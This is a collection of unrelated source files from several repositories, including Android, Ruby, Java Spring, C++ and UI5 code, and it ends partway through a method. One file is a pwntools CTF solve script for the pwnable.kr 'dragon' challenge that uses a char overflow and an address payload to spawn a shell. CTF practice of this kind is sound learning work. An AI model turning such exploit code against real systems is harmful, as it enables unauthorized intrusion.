public class UpdateActionsTask {
private static final String TAG = UpdateActionsTask.class.getName();
private Context context;
public UpdateActionsTask(Context context) {
this.context = context;
}
public void updateFromServer() {
if (org.smartregister.Context.getInstance().IsUserLoggedOut()) {
logInfo("Not updating from server as user is not logged in.");
return;
}
try {
ServiceTools.startService(context, SyncService.class);
Log.e(TAG, "sync: started" );
} catch (Exception e) {
Log.e(TAG, "sync: error" );
}
}
}
|
zoodles/vocab
|
lib/vocab/extractor/rails.rb
|
<filename>lib/vocab/extractor/rails.rb
module Vocab
module Extractor
class Rails < Base
DIFF = 'en.yml'
FULL = 'en.full.yml'
DIFF_SUFFIX = 'diff.yml'
FULL_SUFFIX = 'full.yml'
class << self
def write_diff( strings, plurals, path, locale = :en )
path ||= "#{Vocab.root}/#{locale}.#{DIFF_SUFFIX}"
write( strings, path )
end
def write_full( strings, plurals, path, locale = :en )
path ||= "#{Vocab.root}/#{locale}.#{FULL_SUFFIX}"
write( strings, path )
end
def write( translations, path, locale = :en )
data = hasherize( translations, locale ).to_yaml
File.open( path, "w+" ) { |f| f.write( data ) }
Vocab.ui.say( "Extracted to #{path}" )
end
def previous_strings( locales_root = nil )
locales_root ||= "config/locales"
tmpdir = "#{Vocab.root}/tmp/last_translation"
`rm -rf #{tmpdir}/*`
sha = Vocab.settings.last_translation
translation_files = `git ls-tree --name-only -r #{sha}:#{locales_root}`.split( "\n" )
translation_files = translation_files.select { |f| f =~ /en.(yml|rb)$/ }
translation_files.each do |path|
tmpdir_path = "#{tmpdir}/#{path}"
FileUtils.mkdir_p( File.dirname( tmpdir_path ) )
File.open( tmpdir_path, "w+" ) do |f|
yml = previous_file( "#{locales_root}/#{path}", sha )
f.write( yml )
end
end
return translations( tmpdir )
end
def current_strings( locales_root = nil )
locales_root ||= "#{Vocab.root}/config/locales"
return translations( locales_root )
end
# Treat this as a no-op because plurals handled like normal strings
def previous_plurals
return {}
end
# Treat this as a no-op because plurals handled like normal strings
def current_plurals
return {}
end
def extract_all( locales_root = nil, result_dir = nil )
locales_root ||= "#{Vocab.root}/config/locales"
result_dir ||= Vocab.root
translator = Vocab::Translator::Rails.new
translator.load_dir( locales_root )
translator.available_locales.each do |locale|
strings = translations( locales_root, locale )
path = "#{result_dir}/#{locale}.full.yml"
write( strings, path, locale )
end
end
def translations( dir, locale = :en )
translator = Vocab::Translator::Rails.new( locale )
translator.load_dir( dir )
return translator.flattened_translations( :prefix => true )
end
def hasherize( diff, locale = :en )
translator = Vocab::Translator::Rails.new( locale )
diff.each do |key, value|
key = key.to_s.gsub!( /^#{locale.to_s}\./, '' )
translator.store( key, value )
end
return translator.translations( :prefix => true )
end
def examples
return [ "#{Vocab.root}/tmp/translations" ]
end
def print_instructions( values = {} )
values[ :diff ] = DIFF
values[ :full ] = FULL
values[ :tree ] = <<-EOS
tmp/translations/es.yml
tmp/translations/zh.yml
EOS
super( values )
end
end
end
end
end
|
ContinuITy-Project/ContinuITy
|
continuity.service.cobra/src/main/java/org/continuity/cobra/controllers/MeasurementDataController.java
|
<reponame>ContinuITy-Project/ContinuITy
package org.continuity.cobra.controllers;
import static org.continuity.api.rest.RestApi.Cobra.MeasurementData.ROOT;
import static org.continuity.api.rest.RestApi.Cobra.MeasurementData.Paths.GET;
import static org.continuity.api.rest.RestApi.Cobra.MeasurementData.Paths.GET_VERSION;
import static org.continuity.api.rest.RestApi.Cobra.MeasurementData.Paths.PUSH_ACCESS_LOGS;
import static org.continuity.api.rest.RestApi.Cobra.MeasurementData.Paths.PUSH_CSV;
import static org.continuity.api.rest.RestApi.Cobra.MeasurementData.Paths.PUSH_LINK;
import static org.continuity.api.rest.RestApi.Cobra.MeasurementData.Paths.PUSH_OPEN_XTRACE;
import static org.continuity.api.rest.RestApi.Cobra.MeasurementData.Paths.PUSH_SESSION_LOGS;
import java.io.IOException;
import java.text.ParseException;
import java.time.LocalDateTime;
import java.util.ArrayList;
import java.util.Date;
import java.util.HashMap;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.concurrent.TimeoutException;
import org.continuity.api.amqp.AmqpApi;
import org.continuity.api.amqp.ExchangeDefinition;
import org.continuity.api.amqp.RoutingKeyFormatter.AppIdAndVersion;
import org.continuity.api.entities.ApiFormats;
import org.continuity.api.entities.config.MeasurementDataSpec;
import org.continuity.api.rest.RestApi;
import org.continuity.cobra.config.RabbitMqConfig;
import org.continuity.cobra.entities.TraceProcessingStatus;
import org.continuity.cobra.managers.ElasticsearchTraceManager;
import org.continuity.idpa.AppId;
import org.continuity.idpa.VersionOrTimestamp;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.spec.research.open.xtrace.api.core.Trace;
import org.springframework.amqp.core.AmqpTemplate;
import org.springframework.amqp.core.Message;
import org.springframework.amqp.core.MessageProperties;
import org.springframework.amqp.rabbit.core.RabbitAdmin;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.beans.factory.annotation.Qualifier;
import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.util.ResourceUtils;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.client.RestTemplate;
import com.rabbitmq.client.AMQP.Queue.DeclareOk;
import io.swagger.annotations.ApiImplicitParam;
import io.swagger.annotations.ApiImplicitParams;
import open.xtrace.OPENxtraceUtils;
import springfox.documentation.annotations.ApiIgnore;
/**
* Controller for storing and retrieving measurement data such as OPEN.xtrace or access logs.
*
* @author <NAME>
*
*/
@RestController
@RequestMapping(ROOT)
public class MeasurementDataController {
private static final Logger LOGGER = LoggerFactory.getLogger(MeasurementDataController.class);
@Autowired
private RabbitAdmin rabbitAdmin;
@Autowired
@Qualifier("plainRestTemplate")
private RestTemplate plainRestTemplate;
@Autowired
private AmqpTemplate amqpTemplate;
@Autowired
private ElasticsearchTraceManager manager;
@Autowired
private TraceProcessingStatus status;
@RequestMapping(value = GET, method = RequestMethod.GET)
@ApiImplicitParams({ @ApiImplicitParam(name = "app-id", required = true, dataType = "string", paramType = "path") })
public ResponseEntity<String> getTraces(@ApiIgnore @PathVariable("app-id") AppId aid, @RequestParam(required = false) List<String> from, @RequestParam(required = false) List<String> to)
throws IOException, TimeoutException {
return getTracesForVersion(aid, null, from, to);
}
@RequestMapping(value = GET_VERSION, method = RequestMethod.GET)
@ApiImplicitParams({ @ApiImplicitParam(name = "app-id", required = true, dataType = "string", paramType = "path"),
@ApiImplicitParam(name = "version", required = true, dataType = "string", paramType = "path") })
public ResponseEntity<String> getTracesForVersion(@ApiIgnore @PathVariable("app-id") AppId aid, @ApiIgnore @PathVariable("version") VersionOrTimestamp version,
@RequestParam(required = false) List<String> from, @RequestParam(required = false) List<String> to) throws IOException, TimeoutException {
if (((from == null) && (to != null)) || ((from != null) && (to == null)) || ((from != null) && (to != null) && (from.size() != to.size()))) {
return ResponseEntity.badRequest().body("'from' and 'to' need to have same length!");
}
List<Trace> traces;
if ((from == null) && (to == null)) {
traces = manager.readTraces(aid, version, null, null);
} else {
Iterator<String> fromIter = from.iterator();
Iterator<String> toIter = to.iterator();
traces = new ArrayList<>();
while (fromIter.hasNext() && toIter.hasNext()) {
String f = fromIter.next();
String t = toIter.next();
Date dFrom = null;
try {
dFrom = ApiFormats.DATE_FORMAT.parse(f);
} catch (ParseException e) {
LOGGER.error("Cannot parse from date!", e);
return ResponseEntity.badRequest().body("Illegal date format of 'from' date: " + f);
}
Date dTo = null;
try {
dTo = ApiFormats.DATE_FORMAT.parse(t);
} catch (ParseException e) {
LOGGER.error("Cannot parse to date!", e);
return ResponseEntity.badRequest().body("Illegal date format of 'to' date: " + t);
}
traces.addAll(manager.readTraces(aid, version, dFrom, dTo));
}
}
String json = OPENxtraceUtils.serializeTraceListToJsonString(traces);
return ResponseEntity.ok(json);
}
@RequestMapping(value = PUSH_LINK, method = RequestMethod.POST)
@ApiImplicitParams({ @ApiImplicitParam(name = "app-id", required = true, dataType = "string", paramType = "path"),
@ApiImplicitParam(name = "version", required = true, dataType = "string", paramType = "path") })
public ResponseEntity<Map<String, Object>> pushDataViaLink(@ApiIgnore @PathVariable("app-id") AppId aid, @ApiIgnore @PathVariable("version") VersionOrTimestamp version,
@RequestBody MeasurementDataSpec spec,
@RequestParam(defaultValue = "false") boolean finish)
throws IOException {
if (ResourceUtils.isUrl(spec.getLink())) {
return responseError(aid, version, spec.getType().toPrettyString(), HttpStatus.BAD_REQUEST, "Improperly formatted link: " + spec.getLink());
}
LOGGER.info("Received link to {} for {}@{}.", spec.getType().toPrettyString(), aid, version);
switch (spec.getType()) {
case ACCESS_LOGS:
String accessLogs = plainRestTemplate.getForObject(spec.getLink(), String.class);
return pushAccessLogs(aid, version, accessLogs, finish);
case OPEN_XTRACE:
String tracesAsJson = plainRestTemplate.getForObject(spec.getLink(), String.class);
return pushOpenXtraces(aid, version, tracesAsJson, finish);
case CSV:
String csvContent = plainRestTemplate.getForObject(spec.getLink(), String.class);
return pushCsv(aid, version, csvContent, finish);
case SESSION_LOGS:
String sessionContent = plainRestTemplate.getForObject(spec.getLink(), String.class);
return pushSessionLogs(aid, version, sessionContent, finish);
case INSPECTIT:
default:
return responseError(aid, version, spec.getType().toPrettyString(), HttpStatus.BAD_REQUEST, "Unsupported measurement data type: " + spec.getType().toPrettyString());
}
}
@RequestMapping(value = PUSH_OPEN_XTRACE, method = RequestMethod.POST)
@ApiImplicitParams({ @ApiImplicitParam(name = "app-id", required = true, dataType = "string", paramType = "path"),
@ApiImplicitParam(name = "version", required = true, dataType = "string", paramType = "path") })
public ResponseEntity<Map<String, Object>> pushOpenXtraces(@ApiIgnore @PathVariable("app-id") AppId aid, @ApiIgnore @PathVariable("version") VersionOrTimestamp version,
@RequestBody String tracesAsJson,
@RequestParam(defaultValue = "false") boolean finish)
throws IOException {
if (!status.isActive()) {
LOGGER.warn("Rejecting OPEN.xtraces for {}@{} due to previous failures.", aid, version);
return responseRejected(aid, version, "open-xtrace");
}
LOGGER.info("Received OPEN.xtraces for {}@{}.", aid, version);
return forwardData("open-xtrace", aid, version, tracesAsJson, finish);
}
@RequestMapping(value = PUSH_ACCESS_LOGS, method = RequestMethod.POST)
@ApiImplicitParams({ @ApiImplicitParam(name = "app-id", required = true, dataType = "string", paramType = "path"),
@ApiImplicitParam(name = "version", required = true, dataType = "string", paramType = "path") })
public ResponseEntity<Map<String, Object>> pushAccessLogs(@ApiIgnore @PathVariable("app-id") AppId aid, @ApiIgnore @PathVariable("version") VersionOrTimestamp version,
@RequestBody String accessLogs,
@RequestParam(defaultValue = "false") boolean finish)
throws IOException {
if (!status.isActive()) {
LOGGER.warn("Rejecting access logs for {}@{} due to previous failures.", aid, version);
return responseRejected(aid, version, "access-logs");
}
LOGGER.info("Received access logs for {}@{}.", aid, version);
return forwardData("access-logs", aid, version, accessLogs, finish);
}
@RequestMapping(value = PUSH_CSV, method = RequestMethod.POST)
@ApiImplicitParams({ @ApiImplicitParam(name = "app-id", required = true, dataType = "string", paramType = "path"),
@ApiImplicitParam(name = "version", required = true, dataType = "string", paramType = "path") })
public ResponseEntity<Map<String, Object>> pushCsv(@ApiIgnore @PathVariable("app-id") AppId aid, @ApiIgnore @PathVariable("version") VersionOrTimestamp version, @RequestBody String csvContent,
@RequestParam(defaultValue = "false") boolean finish)
throws IOException {
if (!status.isActive()) {
LOGGER.warn("Rejecting CSV for {}@{} due to previous failures.", aid, version);
return responseRejected(aid, version, "csv");
}
LOGGER.info("Received CSV for {}@{}.", aid, version);
return forwardData("csv", aid, version, csvContent, finish);
}
@RequestMapping(value = PUSH_SESSION_LOGS, method = RequestMethod.POST)
@ApiImplicitParams({ @ApiImplicitParam(name = "app-id", required = true, dataType = "string", paramType = "path"),
@ApiImplicitParam(name = "version", required = true, dataType = "string", paramType = "path") })
public ResponseEntity<Map<String, Object>> pushSessionLogs(@ApiIgnore @PathVariable("app-id") AppId aid, @ApiIgnore @PathVariable("version") VersionOrTimestamp version,
@RequestBody String sessionContent,
@RequestParam(defaultValue = "false") boolean finish) throws IOException {
if (!status.isActive()) {
LOGGER.warn("Rejecting session logs for {}@{} due to previous failures.", aid, version);
return responseRejected(aid, version, "session-logs");
}
LOGGER.info("Received session logs for {}@{}.", aid, version);
return forwardData("session-logs", aid, version, sessionContent, finish);
}
private ResponseEntity<Map<String, Object>> forwardData(String datatype, AppId aid, VersionOrTimestamp version, String data, boolean finish) {
MessageProperties props = new MessageProperties();
props.setHeader(AmqpApi.Cobra.HEADER_DATATYPE, datatype);
props.setHeader(AmqpApi.Cobra.HEADER_FINISH, finish);
props.setContentEncoding(AmqpApi.Cobra.CONTENT_CHARSET.name());
if ("open-xtrace".equals(datatype)) {
props.setContentType("application/json");
} else {
props.setContentType("text/plain");
}
ExchangeDefinition<AppIdAndVersion> exchange = AmqpApi.Cobra.TASK_PROCESS_TRACES;
Message message = new Message(data.getBytes(AmqpApi.Cobra.CONTENT_CHARSET), props);
amqpTemplate.send(exchange.name(), exchange.formatRoutingKey().of(aid, version), message);
LOGGER.info("{}@{} Forwarded data to {}.", aid, version, exchange.name());
return responseAccepted(aid, version, datatype);
}
private ResponseEntity<Map<String, Object>> responseAccepted(AppId aid, VersionOrTimestamp version, String datatype) {
Map<String, Object> response = responseBase(aid, version, datatype);
response.put("status", HttpStatus.ACCEPTED.value());
response.put("message", "The data has been accepted for processing");
response.put("link", RestApi.Cobra.MeasurementData.GET_VERSION.requestUrl(aid, version).withoutProtocol().get());
return ResponseEntity.accepted().body(response);
}
private ResponseEntity<Map<String, Object>> responseRejected(AppId aid, VersionOrTimestamp version, String datatype) {
return responseError(aid, version, datatype, HttpStatus.CONFLICT, "Trace processing is stopped due to previous failures");
}
private ResponseEntity<Map<String, Object>> responseError(AppId aid, VersionOrTimestamp version, String datatype, HttpStatus status, String message) {
Map<String, Object> response = responseBase(aid, version, datatype);
response.put("status", status.value());
response.put("error", status.getReasonPhrase());
response.put("message", message);
return ResponseEntity.status(status).body(response);
}
private Map<String, Object> responseBase(AppId aid, VersionOrTimestamp version, String datatype) {
Map<String, Object> response = new HashMap<>();
response.put("timestamp", LocalDateTime.now());
response.put("app-id", aid);
response.put("version", version);
response.put("type", datatype);
response.put("num-queued", getQueuedMessages(aid));
return response;
}
private int getQueuedMessages(AppId aid) {
DeclareOk declareOk = rabbitAdmin.getRabbitTemplate().execute(channel -> channel.queueDeclarePassive(RabbitMqConfig.TASK_PROCESS_TRACES_QUEUE_NAME));
return declareOk.getMessageCount();
}
}
|
saq7/MeTA
|
src/index/ranker/okapi_bm25.cpp
|
/**
* @file okapi_bm25.cpp
* @author <NAME>
*/
#include <cmath>
#include "index/inverted_index.h"
#include "index/ranker/okapi_bm25.h"
#include "index/score_data.h"
namespace meta
{
namespace index
{
const std::string okapi_bm25::id = "bm25";
okapi_bm25::okapi_bm25(double k1, double b, double k3) : k1_{k1}, b_{b}, k3_{k3}
{
/* nothing */
}
double okapi_bm25::score_one(const score_data& sd)
{
double doc_len = sd.idx.doc_size(sd.d_id);
// add 1.0 to the IDF to ensure that the result is positive
double IDF = std::log(
1.0 + (sd.num_docs - sd.doc_count + 0.5) / (sd.doc_count + 0.5));
double TF = ((k1_ + 1.0) * sd.doc_term_count)
/ ((k1_ * ((1.0 - b_) + b_ * doc_len / sd.avg_dl))
+ sd.doc_term_count);
double QTF = ((k3_ + 1.0) * sd.query_term_count)
/ (k3_ + sd.query_term_count);
return TF * IDF * QTF;
}
template <>
std::unique_ptr<ranker> make_ranker<okapi_bm25>(const cpptoml::table& config)
{
auto k1 = okapi_bm25::default_k1;
if (auto c_k1 = config.get_as<double>("k1"))
k1 = *c_k1;
auto b = okapi_bm25::default_b;
if (auto c_b = config.get_as<double>("b"))
b = *c_b;
auto k3 = okapi_bm25::default_k3;
if (auto c_k3 = config.get_as<double>("k3"))
k3 = *c_k3;
return make_unique<okapi_bm25>(k1, b, k3);
}
}
}
|
ttomttom/aarc-master-portal
|
master-portal/master-portal-client/src/main/java/eu/rcauth/masterportal/client/MPOA2MPService.java
|
package eu.rcauth.masterportal.client;
import java.security.GeneralSecurityException;
import java.security.cert.X509Certificate;
import java.util.Map;
import edu.uiuc.ncsa.myproxy.MPConnectionProvider;
import edu.uiuc.ncsa.myproxy.MyProxyConnectable;
import edu.uiuc.ncsa.myproxy.oa4mp.client.Asset;
import edu.uiuc.ncsa.myproxy.oa4mp.client.AssetResponse;
import edu.uiuc.ncsa.myproxy.oa4mp.client.ClientEnvironment;
import edu.uiuc.ncsa.myproxy.oa4mp.client.OA4MPServiceProvider;
import edu.uiuc.ncsa.oa4mp.oauth2.client.OA2Asset;
import edu.uiuc.ncsa.oa4mp.oauth2.client.OA2MPService;
import edu.uiuc.ncsa.security.core.Identifier;
import edu.uiuc.ncsa.security.core.exceptions.GeneralException;
import edu.uiuc.ncsa.security.core.util.MyLoggingFacade;
import edu.uiuc.ncsa.security.oauth_2_0.OA2Constants;
import edu.uiuc.ncsa.security.oauth_2_0.client.ATResponse2;
import edu.uiuc.ncsa.security.util.pkcs.ProxyUtil;
import eu.emi.security.authn.x509.impl.OpensslNameUtils;
import eu.emi.security.authn.x509.proxy.ProxyUtils;
public class MPOA2MPService extends OA2MPService {
/* SERVICE LOADER */
public static class MPOA2MPProvider extends OA4MPServiceProvider {
public MPOA2MPProvider(ClientEnvironment clientEnvironment) {
super(clientEnvironment);
}
@Override
public MPOA2MPService get() {
return new MPOA2MPService(clientEnvironment);
}
}
/* CONSTRUCTOR */
protected MyLoggingFacade logger = null;
public MPOA2MPService(ClientEnvironment environment) {
super(environment);
if (getEnvironment() != null) {
logger = getEnvironment().getMyLogger();
} else {
// always return one so even if things blow up some record
// remains...
logger = new MyLoggingFacade("NOENV-MasterPortal");
}
}
/* OVERRIDDEN METHODS */
/**
* Extended /getcert request. This executes the regular /getcert request (just as
* the normal OA4MP Client would) but instead of passing the resulting credential,
* instead it stores it in the form of a long lived proxy certificate.
* <p>
* This method accounts for checking whether the retrieved credential is an
* EEC or a Proxy. In case of an EEC a proxy is created via the MyProxy PUT command.
* In case of the Proxy the MyProxy STORE command is used instead.
*
*/
@Override
public AssetResponse getCert(OA2Asset a, ATResponse2 atResponse2) {
AssetResponse par = super.getCert(a, atResponse2);
logger.info("3.b Certificate request ended, trying to store the received cert in the Credential Store");
try {
// upload certificate to Credential Store
uploadCert(par, a);
// NOTE: cannot properly destroy the privateKey object: .destroy()
// method is not implemented (it's an RSAPrivateCrtKeyImpl), and the
// .getEncoded() method returns a byte[] copy. So set to null and
// wait for the garbage collector.
a.setPrivateKey(null);
return par;
} catch (Throwable e) {
if (e instanceof GeneralException) {
throw (GeneralException) e;
} else {
throw new GeneralException(e);
}
}
}
/**
* This extended method makes sure that the SCOPE parameter
* provided in the parameter map is not getting overwritten
* by any subsequent pre-processing.
* <p>
* This method will only have effect if the provided parameter
* map has its SCOPE parameter set before this method is called.
* <p>
* The SCOPE parameter is being forwarded from the MP Server,
* and it needs to be preserved by the MP Client.
*
* @param asset The current session asset
* @param parameters The parameter map that will end up in the authorize request
*/
@Override
@SuppressWarnings("unchecked")
public void preRequestCert(Asset asset, Map parameters) {
String originalScopes = null;
if ( parameters.get(OA2Constants.SCOPE) != null ) {
// save original SCOPE parameter
originalScopes = (String) parameters.get(OA2Constants.SCOPE);
}
// call super method. this might overwrite the SCOPE parameter
super.preRequestCert(asset, parameters);
if (originalScopes != null && ! originalScopes.isEmpty()) {
// make sure the original SCOPE parameter is set
parameters.put(OA2Constants.SCOPE, originalScopes);
}
}
/* MYPROXY COMMANDS */
/**
* Upload the certificate chain from the AssetResponse and its matching key from
* the OA2Asset into the MyProxy Credential Store.
* <p>
* Use MyProxy PUT command to store a Long Lived Proxy certificate made from the
* EEC found in the assetResp. Call this in case /getcert returns an EEC.
* <p>
* Use MyProxy STORE command to store the Proxy certificate found in the assetResp.
* Call this in case /getcert returns a Proxy.
*
* @param assetResp The asset response of a /getcert request
* @param asset The asset created to identify the ongoing session
* @throws Throwable MyProxy related exceptions
*/
public void uploadCert(AssetResponse assetResp, OA2Asset asset) throws Throwable {
String myproxyPassword = ((MPOA2ClientEnvironment)getEnvironment()).getMyproxyPassword();
long lifetime = getEnvironment().getCertLifetime();
MyProxyConnectable mp = createMPConnection(asset.getIdentifier(), asset.getUsername(), myproxyPassword, lifetime);
mp.setLifetime(lifetime * 1000);
// Get the end entity certificate DN in openssl format. The openssl format is
// necessary because that's what MyProxy Server expects.
X509Certificate eec = ProxyUtils.getEndUserCertificate( assetResp.getX509Certificates() );
String rfcDN = eec.getSubjectDN().getName();
String opensslDN = OpensslNameUtils.convertFromRfc2253( rfcDN , false);
// This enables users with an existing valid proxy to renew their proxy
mp.setRenewer(opensslDN);
// see if the result is a proxy or an EEC
if ( ProxyUtil.isProxy(assetResp.getX509Certificates()) ) {
logger.info("3.b Using MyProxy STORE to store credential");
// Proxy Certificate use STORE
mp.doStore( assetResp.getX509Certificates() , asset.getPrivateKey());
} else {
logger.info("3.b Using MyProxy PUT to store credential");
// User EE Certificate use PUT
mp.doPut( assetResp.getX509Certificates() , asset.getPrivateKey());
}
}
/* HELPER METHODS */
/**
* Create a connection to a MyProxy Server. This method uses the MyProxy Server
* connection configuration, and is written after the MyProxy Connection model
* in the OA4MP Server component.
*
* @param identifier The asset(session) identifier to identify the connection by
* @param userName The username used in the MyProxy connection
* @param password The password used in the MyProxy connection
* @param lifetime The lifetime used in the MyProxy connection
* @return The established MyProxy connection
* @throws GeneralSecurityException In case a connection could not be established.
*/
protected MyProxyConnectable createMPConnection(Identifier identifier, String userName, String password,
long lifetime) throws GeneralSecurityException {
MPOA2ClientEnvironment env = (MPOA2ClientEnvironment)getEnvironment();
MPConnectionProvider<MyProxyConnectable> facades = new MPConnectionProvider<>(logger, env.getMyProxyServices() );
// use null for the LOA since we are not supporting any at the moment
return facades.findConnection(identifier, userName, password, null, lifetime);
}
}
|
IdanBanani/Pwnable.kr-CTF-Writeups
|
pwnable.kr/Rookiss/dragon/solve.py
|
<gh_stars>0
#!/usr/bin/env python2
from pwn import *
ready = True
if ready:
conn = remote('pwnable.kr', 9004)
else:
conn = process(['/home/doublesine/Desktop/dragon'])
def SendLine(s):
conn.sendline(s)
print(s)
sleep(0.5)
# First round will get a failure
# But don't woory, we will win in the next round
def FirstRound():
print conn.read(),
SendLine('1')
print conn.read(),
SendLine('1')
# Win by char overflow
def SecondRound():
print conn.read(),
for i in range(4):
SendLine('3')
print conn.read(),
SendLine('3')
print conn.read(),
SendLine('2')
print conn.read(),
target_addr = pack(0x08048DBF, 32)
print conn.read(),
SendLine('1') # we choose priest
FirstRound()
print conn.read(),
SendLine('1')
SecondRound()
# send payload and you will get shell
# 'fuck' is optional. It is just my murmur.
SendLine(target_addr + 'fuck')
conn.interactive()
|
keremkoseoglu/Kifu
|
web/static/openui5/sap/ui/mdc/link/SemanticObjectMapping-dbg.js
|
<reponame>keremkoseoglu/Kifu
/*
* ! OpenUI5
* (c) Copyright 2009-2020 SAP SE or an SAP affiliate company.
* Licensed under the Apache License, Version 2.0 - see LICENSE.txt.
*/
sap.ui.define([
'sap/ui/core/Element'
], function(Element) {
"use strict";
/**
* Constructor for a new SemanticObjectMapping.
*
* @param {string} [sId] ID for the new control, generated automatically if no ID is given
* @param {object} [mSettings] initial settings for the new control
* @class Type for...
* @extends sap.ui.core.Element
* @version 1.84.9
* @constructor
* @private
* @since 1.58.0
* @alias sap.ui.mdc.link.SemanticObjectMapping
* @ui5-metamodel This control/element also will be described in the UI5 (legacy) designtime metamodel
*/
var SemanticObjectMapping = Element.extend("sap.ui.mdc.link.SemanticObjectMapping", /** @lends sap.ui.mdc.link.SemanticObjectMapping.prototype */
{
metadata: {
library: "sap.ui.mdc",
properties: {
semanticObject: {
type: "string"
}
},
defaultAggregation: "items",
aggregations: {
items: {
type: "sap.ui.mdc.link.SemanticObjectMappingItem",
multiple: true,
singularName: "item"
}
}
}
});
return SemanticObjectMapping;
});
|
Jawbone/Specs
|
PBJVideoPlayer/0.1.4/PBJVideoPlayer.podspec
|
<gh_stars>1-10
Pod::Spec.new do |s|
s.name = "PBJVideoPlayer"
s.version = "0.1.4"
s.summary = "iOS video player, simple drop in component featuring touch-to-play"
s.homepage = "https://github.com/piemonte/PBJVideoPlayer"
s.license = "MIT"
s.authors = { "<NAME>" => "<EMAIL>" }
s.source = { :git => "https://github.com/piemonte/PBJVideoPlayer.git", :tag => "v0.1.4" }
s.frameworks = 'Foundation', 'AVFoundation', 'CoreGraphics', 'QuartzCore', 'UIKit'
s.platform = :ios, '6.0'
s.source_files = 'Source'
s.requires_arc = true
end
|
HubSpot/Baragon
|
BaragonData/src/test/java/com/hubspot/baragon/auth/BaragonAuthFilterTest.java
|
package com.hubspot.baragon.auth;
import static org.junit.jupiter.api.Assertions.assertNotNull;
import com.google.inject.Inject;
import name.falgout.jeffrey.testing.junit.guice.GuiceExtension;
import name.falgout.jeffrey.testing.junit.guice.IncludeModule;
import org.junit.jupiter.api.Test;
import org.junit.jupiter.api.extension.ExtendWith;
@ExtendWith(GuiceExtension.class)
@IncludeModule(AuthFilterTestModule.class)
public class BaragonAuthFilterTest {
@Test
@Inject
public void itCanBuildBaragonAuthFilter(BaragonAuthFilter baragonAuthFilter) {
assertNotNull(baragonAuthFilter);
}
@Test
@Inject
public void itCanBuildBaragonAuthFeatureInstances(
BaragonAuthFeature baragonAuthFeature
) {
assertNotNull(baragonAuthFeature);
}
}
|
Terry-Lee-Git/weirblog-quarkus
|
quarkus-narayana-lra-demo/narayana-lra-client2/src/main/java/org/acme/client/TicketService.java
|
package org.acme.client;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
import org.eclipse.microprofile.rest.client.inject.RegisterRestClient;
@Path("/client")
@Produces(MediaType.APPLICATION_JSON)
@RegisterRestClient
public interface TicketService {
@GET
@Path("/book")
String bookTicket();
}
|
dsqdata/jl-admin-server
|
rtadmin-docs/src/main/java/com/ratel/modules/updata/rest/YqpcController.java
|
package com.ratel.modules.updata.rest;
import com.ratel.config.DataScope;
import com.ratel.framework.exception.BadRequestException;
import com.ratel.modules.docs.domain.ModDocs;
import com.ratel.modules.logging.aop.log.Log;
import com.ratel.modules.updata.domain.YqpcMain;
import com.ratel.modules.updata.service.ModYqpcMainService;
import com.ratel.modules.updata.service.dto.YqpcQueryCriteria;
import io.swagger.annotations.Api;
import io.swagger.annotations.ApiOperation;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.data.domain.PageRequest;
import org.springframework.data.domain.Pageable;
import org.springframework.data.domain.Sort;
import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.security.access.prepost.PreAuthorize;
import org.springframework.validation.annotation.Validated;
import org.springframework.web.bind.annotation.*;
import org.springframework.web.multipart.MultipartFile;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
@RestController
@RequestMapping("/api/modYqpc")
@Api(tags = "文档:疫情排查")
public class YqpcController {
@Autowired
private ModYqpcMainService modYqpcMainService;
@Autowired
private DataScope dataScope;
private static final String ENTITY_NAME = "modYqpc";
@Log("导出文档数据")
@ApiOperation("导出文档数据")
@GetMapping(value = "/download")
@PreAuthorize("@el.check('pcdj:list')")
public void download(HttpServletResponse response, YqpcQueryCriteria criteria) throws IOException {
// 数据权限
criteria.setSystemDeptIds(dataScope.getDeptIds());
modYqpcMainService.download(modYqpcMainService.queryAll(criteria), response);
}
@Log("查询文档")
@ApiOperation("查询文档")
@GetMapping(value = "/all")
@PreAuthorize("@el.check('pcdj:list')")
public ResponseEntity<Object> all() {
return new ResponseEntity<>(modYqpcMainService.queryAll(new YqpcQueryCriteria()), HttpStatus.OK);
}
@Log("查询文档")
@ApiOperation("查询文档")
@GetMapping
@PreAuthorize("@el.check('pcdj:list')")
public ResponseEntity<Object> getModDocs(YqpcQueryCriteria resources, Pageable pageable) {
return new ResponseEntity<>(modYqpcMainService.queryAll(resources, pageable), HttpStatus.OK);
}
@Log("查询文档")
@ApiOperation("查询文档")
@GetMapping(value = "/getModYqpcById/{id}")
@PreAuthorize("@el.check('pcdj:list')")
public ResponseEntity<Object> getModDocsById(@PathVariable Long id) {
return new ResponseEntity<>(modYqpcMainService.findOne(id), HttpStatus.OK);
}
@Log("新增文档")
@ApiOperation("新增文档")
@PostMapping
@PreAuthorize("@el.check('pcdj:add')")
public ResponseEntity<Object> create(@Validated @RequestBody YqpcMain resources, @RequestParam("file") MultipartFile file) {
if (resources.getId() != null) {
throw new BadRequestException("A new " + ENTITY_NAME + " cannot already have an ID");
}
return new ResponseEntity<>(modYqpcMainService.save(resources), HttpStatus.CREATED);
}
@ApiOperation("上传文件")
@PostMapping(value = "/importData")
@PreAuthorize("@el.check('pcdj:add')")
public ResponseEntity<Object> create(@RequestParam("file") MultipartFile file) {
modYqpcMainService.getOne(new Long(888));
PageRequest pageRequest =
new PageRequest(1,10,new Sort(Sort.Direction.DESC,"id"));
modYqpcMainService.findPage(pageRequest);
return new ResponseEntity<>(new Object(), HttpStatus.CREATED);
}
@Log("修改文档")
@ApiOperation("修改文档")
@PutMapping
@PreAuthorize("@el.check('pcdj:edit')")
public ResponseEntity<Object> update(@Validated(ModDocs.Update.class) @RequestBody YqpcMain resources) {
modYqpcMainService.save(resources);
return new ResponseEntity<>(HttpStatus.NO_CONTENT);
}
@Log("删除文档")
@ApiOperation("删除文档")
@DeleteMapping(value = "/{id}")
@PreAuthorize("@el.check('pcdj:del')")
